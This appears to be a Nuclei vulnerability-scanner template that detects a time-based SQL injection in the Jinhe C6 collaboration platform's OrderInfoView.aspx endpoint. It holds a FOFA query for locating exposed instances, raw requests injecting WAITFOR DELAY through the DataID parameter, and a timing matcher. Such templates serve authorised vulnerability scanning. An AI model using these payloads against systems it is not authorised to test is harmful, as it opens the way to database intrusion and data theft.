id: jinhewanlu-c6-OrderInfoView_aspx-sql-time

info:
  name: 金和C6协同管理平台 /c6/JHSoft.Web.CrmOrder/OrderInfoView.aspx 接口SQL延时注入漏洞
  author: HuanXiong
  severity: high
  description: |-
    fofa: app="金和网络-金和OA"
    金和C6协同管理平台 /c6/JHSoft.Web.CrmOrder/OrderInfoView.aspx 接口存在SQL延时注入漏洞，攻击者可通过构造恶意的SQL语句进行延时注入攻击，可能导致数据库敏感信息泄露。
  reference:
    - 
  tags: sql-time, jinhewanlu, c6

http:
  - raw:
      - |-
        GET /c6/JHSoft.Web.CrmOrder/OrderInfoView.aspx/?DataID=1;WAITFOR+DELAY+'0:0:2'-- HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36

      - |-
        GET /c6/JHSoft.Web.CrmOrder/OrderInfoView.aspx/?DataID=1;WAITFOR+DELAY+'0:0:4'-- HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36

    matchers:
      - type: dsl
        name: SQL延时注入
        dsl:
          - "status_code==200 && duration_1>=4 && duration_1<=5 && duration_2>=8 && duration_2<=9"